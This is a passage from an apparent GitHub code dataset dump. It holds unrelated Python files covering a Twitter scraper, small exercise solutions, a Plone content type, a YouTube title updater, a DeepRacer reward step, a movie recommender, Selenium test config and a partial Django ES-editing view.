Default is 100.\n language: :obj:`str`\n Language of tweets.\n\n Returns\n -------\n :obj:`list`\n List of :obj:`tweepy.tweet` objects.\n\n \"\"\"\n\n # Handle pagination using the cursor object.\n cursor = tweepy.Cursor(\n api.search,\n q=search_term,\n language=language,\n include_entities=True,\n tweet_mode=\"extended\"\n ).items(max_tweets)\n\n # Gather the data, pausing 15 minutes any time the request limit is hit.\n tweet_data = []\n while True:\n try:\n tweet = cursor.next()\n tweet_data.append(tweet)\n except tweepy.TweepError:\n print(\"Entering except block, waiting...\")\n time.sleep(60 * 15)\n print(\"Continuing search...\")\n continue\n except StopIteration:\n # Entered when `max_tweets` reached.\n break\n\n return tweet_data\n\n\ndef create_tweet_data_dict_from_tweet_obj(tweet, tweet_attrs):\n \"\"\"Pulls relevant data from a `Tweet` object into a dictionary.\n\n tweet: tweepy.Tweet\n Tweepy `Tweet` object, returned from a search method.\n tweet_attrs: list\n List of attributes to be collected from `tweet`.\n\n \"\"\"\n single_tweet_dict = {}\n try:\n single_tweet_dict[\"text\"] = f\"RT @{tweet.retweeted_status.user._json['screen_name']}{tweet.retweeted_status.full_text}\" if tweet.full_text.startswith(\"RT @\") else tweet.full_text\n except AttributeError:\n single_tweet_dict[\"text\"] = tweet.full_text\n\n for attr in tweet_attrs:\n single_tweet_dict[attr] = getattr(tweet, attr)\n\n # Additional attrs accessed through additional hierarchy.\n single_tweet_dict[\"created_at\"] = tweet.created_at.strftime(\"%d-%b-%Y %H:%M:%S\")\n single_tweet_dict[\"hashtags\"] = [entity[\"text\"] for entity in tweet.entities[\"hashtags\"]]\n single_tweet_dict[\"mentions\"] = [entity[\"screen_name\"] for entity in tweet.entities[\"user_mentions\"]]\n user_dictionary = tweet._json[\"user\"]\n single_tweet_dict[\"user_followers_count\"] = user_dictionary[\"followers_count\"]\n single_tweet_dict[\"user_screen_name\"] = user_dictionary[\"screen_name\"]\n single_tweet_dict[\"user_user_location\"] = user_dictionary[\"location\"]\n single_tweet_dict[\"search_method\"] = \"search_function\"\n single_tweet_dict[\"is_rt\"] = True if hasattr(tweet, \"retweeted_status\") else False\n\n return single_tweet_dict\n\n\ndef create_tweet_data_dict_from_status_obj(status, tweet_attrs):\n \"\"\"Pulls relevant data from a `Status` object into a dictionary.\n\n tweet: tweepy.Status\n Tweepy `Status` object, returned from a search method.\n tweet_attrs: list\n List of data to be collected from `Status`.\n\n \"\"\"\n single_tweet_dict = {}\n try:\n key = 'retweeted_status'\n original_text = status._json[\"full_text\"]\n rt_text = status._json[key][\"full_text\"]\n user_screen_name = status._json[key]['user']['screen_name']\n single_tweet_dict[\"text\"] = f\"RT @{user_screen_name}{rt_text}\" if original_text.startswith(\"RT @\") else original_text\n is_rt = True\n except KeyError:\n single_tweet_dict[\"text\"] = status._json[\"full_text\"]\n is_rt = False\n\n for attr in tweet_attrs:\n single_tweet_dict[attr] = status._json[attr]\n\n # Additional key-values accessed through additional hierarchy.\n single_tweet_dict[\"created_at\"] = status._json[\"created_at\"]\n single_tweet_dict[\"hashtags\"] = [entity[\"text\"] for entity in status._json[\"entities\"][\"hashtags\"]]\n single_tweet_dict[\"mentions\"] = [entity[\"screen_name\"] for entity in status._json[\"entities\"][\"user_mentions\"]]\n user_dictionary = status._json[\"user\"]\n single_tweet_dict[\"user_followers_count\"] = 
user_dictionary[\"followers_count\"]\n single_tweet_dict[\"user_screen_name\"] = user_dictionary[\"screen_name\"]\n single_tweet_dict[\"user_user_location\"] = user_dictionary[\"location\"]\n single_tweet_dict[\"search_method\"] = \"user_timeline\"\n single_tweet_dict[\"is_rt\"] = is_rt\n\n return single_tweet_dict\n\n\ndef save_tweets_as_json(tweet_list, *, filename, search_term, search_method=\"search\"):\n \"\"\"Extracts data from tweets and saves as JSON file.\n\n Parameters\n ----------\n tweet_list: list\n List of `Tweet` objects when `search` function is used. List of `Status`\n objects when `user_timeline` function is used.\n filename: str\n Name of JSON file to be saved, including relative path from working\n directory to target destination. JSON file extension (.json) will be\n appended automatically if not included in this argument.\n search_term: str\n Query term used to extract the tweets in `tweet_list`.\n search_method: str\n Default is \"search\". Must be a valid type of tweepy search. Search and\n user timeline queries currently supported.\n\n Notes\n -----\n This function handles saves from two types of searches. A tweepy search\n returns a list of `Tweet` objects, whereas a tweepy user timeline search\n returns a list of `Status` objects. These objects have different attributes,\n warranting different functions to collect the same data.\n\n The `reply count` attribute is only available with premium accounts.\n\n \"\"\"\n SEARCH_KEYWORD = \"search\"\n USER_TIMELINE_KEYWORD = \"user_timeline\"\n search_methods = (SEARCH_KEYWORD, USER_TIMELINE_KEYWORD)\n if search_method.lower() not in search_methods:\n q = f\"search_method must take one of the following values : {search_methods}\"\n raise ValueError(q)\n\n data_dict, metadata, tweets = {}, {}, []\n\n search_date_str = date.today().strftime(\"%d-%b-%Y\")\n\n tweet_attrs = [\"id\", \"retweet_count\", \"favorite_count\",\n \"in_reply_to_status_id\", \"in_reply_to_screen_name\",\n \"in_reply_to_user_id\", \"source\", \"lang\", \"geo\",\n \"coordinates\"]\n\n if search_method == SEARCH_KEYWORD:\n for tweet in tweet_list:\n tweets.append(create_tweet_data_dict_from_tweet_obj(tweet, tweet_attrs))\n num_tweets = len(tweet_list)\n elif search_method == USER_TIMELINE_KEYWORD:\n num_tweets = 0\n for tweet in tweet_list:\n tweets.append(create_tweet_data_dict_from_status_obj(tweet, tweet_attrs))\n num_tweets += 1 # As length of iterator unknown.\n\n metadata[\"date_collected\"] = search_date_str\n metadata[\"search_term\"] = f\"User timeline: @{search_term}\" if search_method == USER_TIMELINE_KEYWORD else f\"search: {search_term}\"\n metadata[\"num_tweets\"] = num_tweets\n\n data_dict[\"metadata\"] = metadata\n data_dict[\"tweets\"] = tweets\n\n root, ext = os.path.splitext(f\"../data/{filename}\")\n if ext != \".json\":\n print(f\"The extension {ext} is invalid. 
Replacing with '.json'\")\n ext = \".json\"\n filename = f\"{root}-{search_date_str}{ext}\"\n\n with open(filename, \"w\") as json_file:\n json.dump(data_dict, json_file)\n\n return\n\n\ndef open_json(filename):\n \"\"\"Opens JSON file a dictionary.\n\n Parameters\n ----------\n filename :obj:`str`\n Name of JSON file being loaded.\n\n Returns\n -------\n :obj:`dict`\n Dictionary containing JSON data.\n\n \"\"\"\n with open(filename) as json_file:\n data_dict = json.load(json_file)\n return data_dict\n\n\ndef open_json_as_dataframe(filename):\n \"\"\"Converts JSON data to pandas dataframe.\n\n Parameters\n ----------\n filename : str\n Name of JSON file being loaded.\n\n Returns\n -------\n pd.DataFrame\n Pandas dataframe with information on tweets.\n dict\n Dictionary containing query metadata.\n\n \"\"\"\n data_dict = open_json(filename)\n metadata_dict = data_dict[\"metadata\"]\n df = pd.DataFrame(data_dict[\"tweets\"])\n df.index.name = \"tweet_id\"\n return df, metadata_dict\n\n\ndef de_emojify(text):\n \"\"\"Removes emojis from a string.\n\n Parameters\n ----------\n text : str\n String to remove emojis from.\n\n Returns\n -------\n text : str\n String with any emojis removed.\n\n Notes\n -----\n See https://stackoverflow.com/questions/33404752/\n removing-emojis-from-a-string-in-python\n\n \"\"\"\n regrex_pattern = re.compile(\n pattern=\"[\"\n u\"\\U0001F600-\\U0001F64F\" # emoticons\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n \"]+\", flags=re.UNICODE)\n return regrex_pattern.sub(r'', text)\n\n\ndef clean(docs):\n \"\"\"Removes emails, new lines, single quotation marks and urls, emojis.\n\n Parameters\n ----------\n doc_list\n List of documents to be cleaned.\n Returns\n -------\n list\n List of cleaned documents.\n\n \"\"\"\n docs_clean = [re.sub('\\S*@\\S*\\s?', '', sent) for sent in docs]\n docs_clean = [re.sub('\\s+', ' ', sent) for sent in docs_clean]\n docs_clean = [re.sub(\"\\'\", \"\", sent) for sent in docs_clean]\n docs_clean = [re.sub(\"([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \"\", sent) for sent in docs_clean]\n docs_clean = [de_emojify(sent) for sent in docs_clean]\n return docs_clean\n","repo_name":"jackirvine97/twitter_analysis","sub_path":"examples/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19055755954","text":"# https://www.hackerrank.com/challenges/np-arrays/problem\nimport numpy\n\n\ndef arrays(array):\n array = numpy.array(array, dtype=float)\n array = numpy.flip(array)\n return array\n\n\narr = input().strip().split(' ')\nresult = arrays(arr)\nprint(result)\n","repo_name":"RitamChakraborty/HackerRank_Python","sub_path":"Numpy/Arrays/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"16967355537","text":"\n# 어떤 양의 정수 X의 각 자리가 등차수열을 이룬다면, 그 수를 한수라고 한다. \n# 등차수열은 연속된 두 개의 수의 차이가 일정한 수열을 말한다. \n# 즉,10은 1과 0으로 이루어짐 1-0=1 차이가 1인 등차수열\n# 200은 2 0 0 2-0=2 0-0=0 2!=0 즉, 등차 수열이 아니다\n# 로직은 간단하다 1의자리 숫자는 숫자 하나이므로 전부 다 등차수열\n# 10의 자리 수들도 각 자리가 숫자 두개이므로 전부 다 등차수열\n# 100 미만은 등차수열이다.\n# 100 이상의 경우 문자열로 바꿔준 다음 인덱스로 접근해서 각 자리 숫자의 차가 같은지를 비교하면 될 듯\n# N이 주어졌을 때, 1보다 크거나 같고, N보다 작거나 같은 한수의 개수를 출력하는 프로그램을 작성하시오. 
\n\nX = int(input())\n\ncnt = 0\nfor i in range(1, X+1):\n if i < 100:\n cnt += 1\n else:\n i = list(map(int, str(i))) # str[i]를 순환하면서 int로 변환하고 그걸 list에 담는다\n if i[0] - i[1] == i[1] - i[2]:\n cnt += 1\nprint(cnt)\n ","repo_name":"wdahlia/Python-Algorithm","sub_path":"KDT 실습/0725 BOJ/1065_한수.py","file_name":"1065_한수.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"74002519093","text":"# -*- coding: utf-8 -*-\nfrom plone.app.textfield import RichText\nfrom plone.autoform import directives\nfrom plone.dexterity.content import Item\nfrom plone.supermodel import model\nfrom plone.supermodel.directives import fieldset\nfrom z3c.form.browser.radio import RadioFieldWidget\nfrom plone import api as ploneapi\nfrom z3c.relationfield.schema import RelationChoice, RelationList\nfrom zope.interface import provider\nfrom plone.autoform import directives as form\nfrom zope.schema.interfaces import IContextSourceBinder\nfrom zope.schema.vocabulary import SimpleVocabulary, SimpleTerm\nfrom collective.z3cform.datagridfield import DataGridFieldFactory\nfrom collective.z3cform.datagridfield import DictRow\nfrom plone.app.vocabularies.catalog import CatalogSource\nfrom z3c.form.interfaces import NOVALUE\nfrom zope import schema\nfrom zope.interface import implementer\nfrom zope.component import getUtility\nfrom plone.i18n.normalizer.interfaces import IIDNormalizer\nfrom zope.interface import implementer\nfrom zope.globalrequest import getRequest\n\ndictdefault={'ja':u'', 'unbekannt':u'', 'nein':u''}\n\nlistdefault=[\n {u'antwort':u'ja', u'aktion':None, u'color':u'#51AE31', u'rates':u'ok'},\n {u'antwort':u'unbekannt', u'aktion':None, u'color':u'#F39200', u'rates':u'klaerung'},\n {u'antwort':u'nein', u'aktion':None, u'color':u'#D40F14', u'rates':u'handlung'},\n ]\n\n@provider(IContextSourceBinder)\ndef possibleQuestionsOrPages(context):\n #request = getRequest()\n #context = request.PARENTS[0]\n #context = context.aq_parent\n brains = ploneapi.content.find(portal_type=[u'Hinweistext', u'Frage'])\n terms = []\n if brains:\n for i in brains:\n obj = i.getObject()\n fragebogen = obj.fbid\n vocabtitle = \"%s-%s (%s)\" %(fragebogen, i.Title, i.portal_type)\n terms.append(SimpleVocabulary.createTerm(i.UID, i.UID, vocabtitle))\n terms.sort(key=lambda x: x.title)\n return SimpleVocabulary(terms) \n\n\n\n@provider(IContextSourceBinder)\ndef possibleThemen(context):\n terms = []\n normalizer = getUtility(IIDNormalizer)\n themenbereiche = context.themenbereiche\n if themenbereiche:\n for i in themenbereiche:\n mytoken = normalizer.normalize(i)\n terms.append(SimpleVocabulary.createTerm(i,mytoken,i))\n return SimpleVocabulary(terms)\n\ncolorterms = [\n SimpleTerm(u'#555555', u'secondary', u'siguv-grau'),\n SimpleTerm(u'#004994', u'primary', u'siguv-blau'),\n SimpleTerm(u'#0095DB', u'info', u'siguv-cyan'),\n SimpleTerm(u'#51AE31', u'success', u'siguv-grün'),\n SimpleTerm(u'#F39200', u'warning', u'siguv-orange'),\n SimpleTerm(u'#D40F14', u'danger', u'siguv-rot'),\n SimpleTerm(u'#B80D78', u'dark', u'siguv-violett'),\n SimpleTerm(u'#FFCC00', u'light', u'siguv-gelb'),\n ]\nSiguvColors = SimpleVocabulary(colorterms)\n\nrating = [\n SimpleTerm(u'keine', u'keine', u'keine Bewertung'),\n SimpleTerm(u'ok', u'ok', u'OK'),\n SimpleTerm(u'klaerung', u'klaerung', u'Klärungsbedarf'),\n SimpleTerm(u'handlung', u'handlung', u'Handlungsbedarf'),\n ]\nRatingValues = SimpleVocabulary(rating)\n\n\nclass IAnswerOptions(model.Schema):\n 
antwort = schema.TextLine(title=u\"Antwortoption\")\n\n aktion = schema.Choice(title=u\"Aktion\",\n source=possibleQuestionsOrPages,\n required=False)\n\n color = schema.Choice(title=u\"Farbe\",\n source=SiguvColors,\n required=False)\n\n rates = schema.Choice(title=u\"Bewertung\",\n source=RatingValues,\n default=u'keine',\n required=False)\n\nclass IFrage(model.Schema):\n \"\"\" Marker interface and Dexterity Python Schema for Frage\n \"\"\"\n\n fbid = schema.TextLine(title=u\"Kürzel oder Nummer des Fragebogens\")\n\n frage = RichText(title=u\"Fragestellung\",\n description=u\"Bitte bearbeiten Sie hier die Frage für die Checkliste\")\n\n thema = schema.Choice(title=u\"Auswahl des Themas für die Frage\",\n source=possibleThemen,\n required=False)\n\n form.widget('optionen', DataGridFieldFactory)\n optionen = schema.List(title=u\"Antwortoptionen\",\n required=True,\n value_type=DictRow(title=u\"Optionen\", schema=IAnswerOptions),\n default=listdefault)\n\n tipp = RichText(title=u\"Hinweis zur Fragestellung\",\n description=u\"Bitte bearbeiten Sie hier einen Hinweis zur Frage\",\n required=False)\n\n\n@implementer(IFrage)\nclass Frage(Item):\n \"\"\"\n \"\"\"\n","repo_name":"kraeks/edi.checkapp","sub_path":"src/edi/checkapp/content/frage.py","file_name":"frage.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42229220861","text":"import os\r\n\r\nimport google_auth_oauthlib.flow\r\nimport googleapiclient.discovery\r\nimport googleapiclient.errors\r\n\r\nscopes = [\"https://www.googleapis.com/auth/youtube.force-ssl\"]\r\n\r\n# Disable OAuthlib's HTTPS verification when running locally.\r\n# *DO NOT* leave this option enabled in production.\r\nos.environ[\"OAUTHLIB_INSECURE_TRANSPORT\"] = \"1\"\r\n\r\napi_service_name = \"youtube\"\r\napi_version = \"v3\"\r\nclient_secrets_file = \"C:/secret-file.json\"\r\n\r\n# Get credentials and create an API client\r\nflow = google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file(\r\n client_secrets_file, scopes)\r\ncredentials = flow.run_console()\r\nyoutube = googleapiclient.discovery.build(\r\n api_service_name, api_version, credentials=credentials)\r\n\r\n# Get the initial response\r\ninitial_request = youtube.videos().list(\r\n part=\"statistics\",\r\n id=\"5lUXhaVbyRs\"\r\n )\r\ninitial_response = initial_request.execute()\r\n\r\n# Parse view count from the update response\r\nprint(initial_response)\r\nview_count_dict = initial_response[\"items\"][0][\"statistics\"]\r\nview_count = view_count_dict[\"viewCount\"]\r\n\r\nupdate_request = youtube.videos().update(\r\n part=\"snippet\",\r\n body={\r\n \"id\": \"5lUXhaVbyRs\",\r\n \"snippet\": {\r\n \"title\": \"This video have \" + view_count + \" views\",\r\n \"categoryId\": \"27\",\r\n \"channelId\": \"UCPfgEZOccr6tPVvMeKOJ-Dw\"\r\n },\r\n }\r\n)\r\nupdate_request.execute()\r\n\r\n\r\nprint(\"Title successfuly changed to: This video have\", view_count, \"views\")","repo_name":"Jinan47/Youtube-Video-Title-Updater","sub_path":"video_title_updater.py","file_name":"video_title_updater.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4450753262","text":"from tboneDeepRacerUtils import calcDistanceFromCenter, getClosestWaypoints, getDistanceCenterLine,getCurLocation,inside_borders,speed,progress,direction_and_waypoint,follow_centerline\n\nclass RaceStep:\n def __init__(self, stepParams, 
params, stepNum, HISTORY):\n self.HISTORY = HISTORY\n if stepNum == 0:\n self.location = HISTORY.prev_location \n self.closest_waypoints = HISTORY.prev_closest_waypoints if HISTORY.prev_closest_waypoints != None else (0,1)\n print(\"closest_waypoints: \"+str(self.closest_waypoints))\n self.distance_from_center = HISTORY.prev_distance_centerline if HISTORY.prev_distance_centerline != None else 0.00\n print(\"distance_from_center: \"+str(self.distance_from_center))\n self.onTrack = True if (params[\"track_width\"]*.5)>self.distance_from_center else False\n self.stepReward = self.calcStepReward(stepParams, params) if self.onTrack else 0\n self.stepNumber = stepParams[\"stepNumber\"]\n elif stepNum == 1:\n self.location = stepParams[\"location\"]\n self.closest_waypoints = params[\"closest_waypoints\"]\n print(\"closest_waypoints: \"+str(self.closest_waypoints))\n self.distance_from_center = params[\"distance_from_center\"]\n print(\"distance_from_center: \"+str(self.distance_from_center))\n self.onTrack = True if (params[\"track_width\"]*.5)>self.distance_from_center else False \n self.stepReward = self.calcStepReward(stepParams, params) if self.onTrack else 0\n self.stepNumber = stepParams[\"stepNumber\"]\n else:\n self.location = stepParams[\"location\"]\n self.closest_waypoints = getClosestWaypoints(self.location, stepParams, params)\n print(\"closest_waypoints: \"+str(self.closest_waypoints))\n self.distance_from_center = calcDistanceFromCenter(self.closest_waypoints,self.location,stepParams,params)\n print(\"distance_from_center: \"+str(self.distance_from_center))\n self.onTrack = True if (params[\"track_width\"]*.5)>self.distance_from_center else False\n self.stepReward = self.calcStepReward(stepParams, params) if self.onTrack else 0\n self.stepNumber = stepParams[\"stepNumber\"]\n\n def calcStepReward(self, stepParams, params):\n rewardParams = params.copy()\n rewardParams[\"distance_from_center\"] = self.distance_from_center\n rewardParams[\"closest_waypoints\"]= self.closest_waypoints\n centerline_reward = follow_centerline(rewardParams)\n #inside_reward = inside_borders(rewardParams)\n #speed_reward = speed(rewardParams)\n# direction_reward = direction_and_waypoint(rewardParams)\n# curProg = progress(rewardParams)\n #print(\"CenterLine: \"+str(centerline_reward)+\" Direction Reward: \"+str(direction_reward)+\"Progress: \"+str(curProg))\n #print(\"CenterLine: \"+str(centerline_reward)+\" Direction Reward: \"+str(direction_reward)+\" Speed: \"+str(speed_reward))\n #print(\"CenterLine: \"+str(centerline_reward))\n# return float(centerline_reward+direction_reward+curProg)\n return float(centerline_reward)","repo_name":"thh0003/DeepRacer","sub_path":"tboneDeepRacerRaceStep.py","file_name":"tboneDeepRacerRaceStep.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9837066861","text":"import pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nimport difflib\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\n\r\ndf9 = pd.read_csv('Final.csv')\r\ndef getindex(given_id):\r\n for i in range(len(df9)):\r\n if df9['id'][i] == given_id:\r\n return i\r\n\r\n\r\nmovies_list = df9['title_x'].to_list()\r\nvector = TfidfVectorizer()\r\ncombined_data = df9['genres'] + ' ' + df9['keywords'] + ' ' + df9['tagline'] + ' ' + df9['cast'] + ' ' + df9['directors']\r\nfeatures = 
vector.fit_transform(combined_data.astype('U'))\r\nsimilarity = cosine_similarity(features)\r\n\r\ndef find_movie(movie_name):\r\n try:\r\n\r\n\r\n movie_name_crrt = difflib.get_close_matches(movie_name,movies_list)[0]\r\n movie_id = df9[df9['title_x'] == movie_name_crrt].values[0][3]\r\n index_of_the_movie = getindex(movie_id)\r\n score_of_similarity = list(enumerate(similarity[index_of_the_movie]))\r\n similar_movies_list = sorted(score_of_similarity,key=lambda x:x[1],reverse=True)[:12]\r\n final_output = []\r\n for i in similar_movies_list:\r\n final_output.append([df9.iloc[i[0]]['title_x'],df9.iloc[i[0]]['directors'],df9.iloc[i[0]]['release_date']])\r\n return final_output\r\n except:\r\n return [['None','None','None']]\r\n\r\nif __name__ == '__main__':\r\n print('Welcome to the Module Page')\r\n\r\n","repo_name":"bhuvan-bhu1/Movie_Recommendation","sub_path":"module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10052067631","text":"import sys\nimport os\nfrom time import sleep\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n\n# Wait for nodes to be registered\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\nROBOT_BROWSER_TIMEOUT = 30\nTIMEOUT = \"20s\"\nPOLLTIME = \"2s\"\n\ndef check_browser(url):\n elapsed_time = 0\n while elapsed_time != ROBOT_BROWSER_TIMEOUT:\n try:\n driver = webdriver.Remote(\n command_executor=url,\n desired_capabilities=getattr(DesiredCapabilities, 'CHROME')\n )\n driver.quit()\n break\n except:\n sleep(1)\n elapsed_time+=1\n\nTEST_URL = os.getenv('PROJECT_URL')\nBROWSER = os.getenv('BROWSER')\nCOMMAND_EXECUTOR = os.getenv('SELENIUM_HUB')\nDESIRED_CAPABILITIES = {'browserName': BROWSER}\nif not BROWSER:\n BROWSER = 'chrome'\nelif BROWSER == 'ie':\n DESIRED_CAPABILITIES = {'browserName': 'IE', 'browser_version': '11.0', 'os': 'Windows', 'os_version': '8.1', 'resolution': '1024x768', 'browserstack.local': True}\nelif BROWSER == 'safari':\n DESIRED_CAPABILITIES = {'browserName': 'Safari', 'browser_version': '10.1', 'os': 'OS X', 'os_version': 'Sierra', 'resolution': '1024x768', 'browserstack.safari.enablePopups': False, 'browserstack.local': True}\nelif BROWSER == 'iphone':\n DESIRED_CAPABILITIES = {'browserName': 'iPhone', 'platform': 'MAC', 'device': 'iPhone 6S Plus', 'browserstack.safari.enablePopups': False, 'browserstack.local': True}\nelif BROWSER == 'android':\n DESIRED_CAPABILITIES = {'browserName': 'android', 'platform': 'ANDROID', 'device': 'Samsung Galaxy S5', 'browserstack.local': True}\n\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ntest_session = {\n 'role': 'business owner', # Default user is business owner\n 'username': None,\n 'password': None,\n 'login_method': 'PAGE' # Default login is through login page\n}\n","repo_name":"Anu016/POC_automation","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19937812251","text":"# a bar plot with errorbars\nimport numpy as np\nimport matplotlib.pyplot as pl\nimport json\nfrom .db_helper import test_sets\n\nclass BenchmarkRepo:\n @classmethod\n def load(cls, report_path):\n filename = '/'.join(['benchmark', 'results', report_path])\n with open(filename) as f:\n return 
BenchmarkRepo(json.loads(f.read()))\n\n def __init__(self, raw_benchmark_dict):\n self.raw_benchmark_dict = raw_benchmark_dict\n\n @property\n def means(self):\n return [bm_stats['mean'] * 1000 for bm_stats in self.stats]\n\n @property\n def stddevs(self):\n return [bm_stats['stddev'] * 1000 for bm_stats in self.stats]\n\n @property\n def name(self):\n return self.benchmarks[0]['fullname'].split('::')[0]\n\n def benchmark_names(self, split_by='__'):\n return [bm['name'].split(split_by)[-1] for bm in self.benchmarks]\n\n @property\n def stats(self):\n return [bm['stats'] for bm in self.benchmarks]\n\n @property\n def benchmarks(self):\n return self.raw_benchmark_dict['benchmarks']\n\n\ndef show_plot(report_name):\n new_bm_repo = BenchmarkRepo.load(report_name)\n old_bm_repo = BenchmarkRepo.load(\"current/{}\".format(report_name))\n\n benchmark_json = new_bm_repo.raw_benchmark_dict\n old_benchmark_json = old_bm_repo.raw_benchmark_dict\n\n old_means = old_bm_repo.means\n mean = new_bm_repo.means\n\n name = new_bm_repo.name\n std = new_bm_repo.stddevs\n db_names = new_bm_repo.benchmark_names('_')\n\n users = [test_set.num_of_users for test_set in test_sets]\n handins = [test_set.num_of_handins for test_set in test_sets]\n users_per_handin = [test_set.num_of_users_per_handin for test_set in test_sets]\n\n def build_axis(axis, x_axis, x_label):\n axis.errorbar(x_axis, mean, std)\n axis.errorbar(x_axis, old_means)\n axis.set_ylabel('Time (ms)')\n axis.set_xlabel(x_label)\n axis.set_title(name)\n annotate_db_names(axis, x_axis, mean, db_names)\n\n fig = pl.figure()\n\n a1 = pl.subplot(311)\n build_axis(a1, handins, 'Handins')\n\n a2 = pl.subplot(312)\n build_axis(a2, users, 'Users')\n\n a3 = pl.subplot(313)\n build_axis(a3, users_per_handin, 'Users per Handin')\n\n fig.tight_layout()\n pl.show()\n\n\ndef annotate_db_names(axis, x_axis, y_axis, db_names):\n for index, xy in enumerate(zip(x_axis, y_axis)):\n axis.annotate(db_names[index], xy=xy, textcoords='data')\n","repo_name":"anderslime/smache","sub_path":"benchmark/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9934200073","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import ListView, DetailView, DeleteView, UpdateView\nfrom django import forms\nfrom django.urls import reverse_lazy, reverse\nfrom django.views import View\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom pprint import pprint\nfrom django.db.models import Q\nfrom django.http.response import JsonResponse\n\nfrom .forms import AnswerQuestionFormSet, AnswerQuestionForm\nfrom ..models import CustomUserModel, TagModel, PostModel, ESGroupModel, WordCloudModel\nfrom ..esuits_utils.newsapi import newsapi\nfrom ..esuits_utils.wordcloudapi.get_wordcloud import get_wordcloud\n# Create your views here.\n\n\nclass EsEditView(View):\n '''\n ESの質問に回答するページ\n '''\n\n # 過去に投稿したポストのうち関連するものを取得\n def _get_related_posts_list(self, request, es_group_id):\n post_set = PostModel.objects.filter(es_group_id=es_group_id)\n all_posts_by_login_user = PostModel.objects.filter(es_group_id__author=request.user)\n\n related_posts_list = [\n all_posts_by_login_user\n .filter(tags__in=post.tags.all())\n .exclude(pk=post.pk)\n for post in post_set\n ]\n return related_posts_list\n\n # 関連するニュースの取得 
(いまはダミー)\n def _get_news_list(self, request, es_group_id):\n news_list = [\n {'title': 'ダミーニュース1', 'url': 'https://news.yahoo.co.jp/pickup/6375312'},\n {'title': 'ダミーニュース2', 'url': 'https://news.yahoo.co.jp/pickup/6375301'},\n ]\n return news_list\n\n # 企業の情報を取得 (今は空)\n def _get_company_info(self, request, es_group_id):\n es_info = ESGroupModel.objects.get(pk=es_group_id)\n company_url = es_info.company_url\n\n wordcloud_path = get_wordcloud(company_url)\n company_info = {\"wordcloud_path\": wordcloud_path[1:]}\n return company_info\n\n def get(self, request, es_group_id):\n template_name = 'esuits/es_edit.html'\n\n if ESGroupModel.objects.filter(pk=es_group_id).exists():\n # ESの存在を確認\n es_info = ESGroupModel.objects.get(pk=es_group_id)\n print('es_info.author.pk: ' + str(es_info.author.pk))\n print('request.user.pk: ' + str(request.user.pk))\n\n if (es_info.author == request.user):\n # 指定されたESが存在し,それが自分のESの場合\n post_set = PostModel.objects.filter(es_group_id=es_group_id)\n formset = AnswerQuestionFormSet(instance=es_info)\n\n # 関連したポスト一覧\n related_posts_list = self._get_related_posts_list(request, es_group_id)\n\n # ニュース関連\n news_list = newsapi.get_news(es_info.company)\n\n # 企業の情報 (ワードクラウドなど)\n # company_info = self._get_company_info(request, es_group_id)\n company_info = None\n\n context = {\n 'message': 'OK',\n 'es_info': es_info,\n 'formset_management_form': formset.management_form,\n 'zipped_posts_info': zip(post_set, formset, related_posts_list),\n 'news_list': news_list,\n 'company_info': company_info,\n 'es_group_id': es_group_id,\n 'num_related_posts': len(related_posts_list)\n }\n return render(request, template_name, context)\n else:\n # 指定されたESが存在するが,それが違う人のESの場合\n context = {\n 'message': '違う人のESなので表示できません',\n 'es_info': {},\n 'zipped_posts_info': (),\n }\n return render(request, template_name, context)\n else:\n # 指定されたESが存在しない場合\n context = {\n 'message': '指定されたESは存在しません',\n 'es_info': {},\n 'zipped_posts_info': (),\n }\n return render(request, template_name, context)\n\n def post(self, request, es_group_id):\n # TODO: 質問に対する答えを更新してDBに格納する処理を書く\n template_name = 'esuits/es_edit.html'\n\n if ESGroupModel.objects.filter(pk=es_group_id).exists():\n # ESの存在を確認\n es_info = ESGroupModel.objects.get(pk=es_group_id)\n print('es_info.author.pk: ' + str(es_info.author.pk))\n print('request.user.pk: ' + str(request.user.pk))\n\n if (es_info.author == request.user):\n # 指定されたESが存在し,それが自分のESの場合\n post_set = PostModel.objects.filter(es_group_id=es_group_id)\n formset = AnswerQuestionFormSet(data=request.POST, instance=es_info)\n\n if formset.is_valid():\n formset.save()\n return redirect('esuits:home')\n\n # 関連したポスト一覧\n related_posts_list = self._get_related_posts_list(request, es_group_id)\n\n # ニュース関連\n news_list = 